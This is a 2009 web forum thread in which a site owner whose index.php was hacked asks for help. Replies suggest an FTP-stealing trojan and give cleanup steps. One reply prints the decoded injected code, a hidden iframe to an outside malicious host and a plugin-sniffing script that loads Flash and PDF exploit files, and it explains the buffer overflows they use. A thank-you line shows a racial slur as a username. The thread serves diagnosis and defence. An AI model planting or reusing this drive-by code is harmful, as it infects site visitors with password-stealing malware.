|
Welcome to the GSM-Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. Only registered members may post questions, contact other members or search our database of over 8 million posts. Registration is fast, simple and absolutely free so please - Click to REGISTER! If you have any problems with the registration process or your account login, please contact contact us . |
|
Register | FAQ | Donate | Forum Rules | Root any Device | ★iPhone Unlock★ | ★ Direct Codes ★ | Direct Unlock Source |
Off Topic Zone Here all other messages... |
| LinkBack | Thread Tools | Display Modes |
05-06-2009, 20:00 | #1 (permalink) |
Freak Poster Join Date: Aug 2007 Age: 50
Posts: 233
Member: 565867 Status: Offline Thanks Meter: 15 | Someone hacked my website- Anyone can help me? In the root of my domain, I only have the index.php file which is like a disclaimer, within only basic HTML. Problem is- there past few days.. members started reporting that their anti-virus etc was saying my website is a malicious site, and warning of a virus. I use Nod32, and Avast on my PC's, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE It would start using VERY HIGH memory resourses, but seem to do nothing else. After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file: PHP Code: I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again. I'm also worried that they have uploaded something else on my server too, and not just added this coding. Can anyone give me any help with this? Thanks |
05-06-2009, 23:34 | #4 (permalink) |
Freak Poster Join Date: Aug 2007 Age: 50
Posts: 233
Member: 565867 Status: Offline Thanks Meter: 15 | I've been running this VB for about 8 months with no problem. Thousand's of people are using the release I'm using with no issue- so it can't be the problem. Problem is someone has managed to add this script to my index.php file (Not the VB index.php file). |
05-07-2009, 01:35 | #5 (permalink) |
Freak Poster Join Date: Dec 2002 Location: Scotland
Posts: 451
Member: 18535 Status: Offline Thanks Meter: 11 | I have the same also at www.hhd.co.uk and my IP willnot even help me fix my page.... Any ideas ? Can you virus scan and repair a web page as you would your PC ? maxmix |
05-07-2009, 04:36 | #6 (permalink) | |
Freak Poster Join Date: Aug 2007 Age: 50
Posts: 233
Member: 565867 Status: Offline Thanks Meter: 15 | Quote:
See if any code has been added to it that shouldn't be there. | |
05-07-2009, 05:34 | #7 (permalink) |
Freak Poster Join Date: Nov 2006 Location: Nairobi,Kenya
Posts: 465
Member: 390521 Status: Offline Thanks Meter: 57 | @mobileman According to your Avatar (location) you seem to be in bed with someones wife.Could it be the reason you are having these problems? |
The Following User Says Thank You to papsnew For This Useful Post: |
05-07-2009, 07:51 | #8 (permalink) | |
Freak Poster Join Date: Dec 2002 Location: Scotland
Posts: 451
Member: 18535 Status: Offline Thanks Meter: 11 | Quote:
Thanks for the advice, I have seen this file, deleted it and uploaded my original.... After a few days my site becomes infected again.... It's happened about 6 times now every time I fix it... Can you help... How can they keep altering my index file ? Has my FTP password been comprmised, this is the only thing I have never changed... I gave up on it lol maxmix | |
05-07-2009, 15:04 | #9 (permalink) | |
Freak Poster Join Date: Aug 2007 Age: 50
Posts: 233
Member: 565867 Status: Offline Thanks Meter: 15 | Quote:
Can anyone tell me how this code has been injected to my index.php file? Or explain to me in simple terms how this script works? Thanks | |
05-07-2009, 15:32 | #10 (permalink) |
Junior Member Join Date: May 2009
Posts: 1
Member: 1026294 Status: Offline Sonork: 3101 Thanks Meter: 1 | Change your Passwords Most probably all your FTP user info was hijacked by an FTP Trojan. 1.Scan your PC 2.Change FTP password 3.Remove all bad code manually 4.Report to your hosting Provider If you have problem with removing this code, contact me I may be able to help you. Use my website contact form. www.digidestination.com |
The Following User Says Thank You to Digidestination For This Useful Post: |
05-07-2009, 16:46 | #11 (permalink) |
Junior Member Join Date: May 2009
Posts: 1
Member: 1026333 Status: Offline Thanks Meter: 1 | That javascript blabla comes out to: Code: <iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Code: <script> function mjnhyua() { return 'ra'+'m'; } for(i=0;navigator.plugins[i];i++){ regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)'); var ertdfg = "dfgdfgdfgdf43565gkui"; result=regexp.exec(navigator.plugins[i]['description']); ertdfg = "dfgdfgdfgdf43565gkui"; if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) { ertdfg = "dfgdfgdfgdf43565gkui"; document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>'); ertdfg = "dfgdfgdfgdf43565gkui"; break; } } for(i=0;navigator.plugins[i];i++){ name=navigator.plugins[i].name; if(name.indexOf('Adobe Acrobat')!=-1){ document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>'); break; } } </script> Specifically crafted SWF(flash files) files allow remote file execution when the client has a vulnerable FlashPlayer.A malformed SWF record's value triggers a buffer overflow. The size of the SWF files vary. Usually it's a download and execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of flashplayer up to 9.0.124.0 are vulnerable ( though we saw malicious pages trying to exploit only version 115 and 47). Other file the pdf is This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's Javascript engine in order to execute malicious code on user's computer. The exploitation mainly involves the following two functions: util.printf() - if an attacker sends a string long enough to generate a stack-based buffer overflow he will then be able to execute arbitrary code on user's computer with the same level privileges as the user who opened the PDF file Collab.colectEmailInfo() - a stack-based buffer overflow can be caused by passing a string long enough (at least 44952 characters) as a parameter in the msg field of this function. The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult. The javascript code inside the PDF file is used to download and execute other malware on user's computer. I can conclude that the following people are vurnable to this exploit: people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2 |
The Following User Says Thank You to NIGGERS For This Useful Post: |
05-08-2009, 01:55 | #12 (permalink) |
Freak Poster Join Date: Aug 2007 Age: 50
Posts: 233
Member: 565867 Status: Offline Thanks Meter: 15 | Thanks very much to both of you. Your right my PC was infected (Nod32 never found anything), but uninstalled, the installed Avast, done a boot scan and it found and deleted loads. Site seems fine now, and I've changed my FTP passwords juts incase. Cheers very much for the help, and info on what the script was actually doing. |
05-09-2009, 03:35 | #13 (permalink) |
Freak Poster Join Date: Aug 2007 Age: 50
Posts: 233
Member: 565867 Status: Offline Thanks Meter: 15 | OK Update- Today I've found out that ALL of my sites have been injected with this malicious code. Sites are stored on 2 different servers. One of the things Avast said it found on my PC and removed was a rootkit. I'm guessing it's not removed it completely, and whatevers on my PC is actually injecting the code to all my websites index.php or index.html pages by accessing my FTP accounts. Does anyone have any idea how to remove this from my PC fully? I've tried Avast, and also Superantispyware. Thanks |
Bookmarks |
| |
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
anyone can help me fix my ipod ? :/ | TRABEL | iPhone 2 / iPhone 3G / iPhone 3GS | 6 | 12-03-2007 04:54 |
Please Anyone can help me with my 6280 | sokolibrahimi | Nokia Base Band 5 ( BB-5 ) | 2 | 11-20-2007 15:28 |
Anyone Can Help Me With My V3x | etereo12 | Motorola P2k | 1 | 08-23-2006 17:07 |
pls anyone can help me with my ufs3 | bygeeson | UFS2 + UFS3-Tornadoflasher | 2 | 05-13-2006 15:18 |
Anyone can help me with my fighter? | ez2dj | Cruiser Suite | 10 | 10-15-2004 01:42 |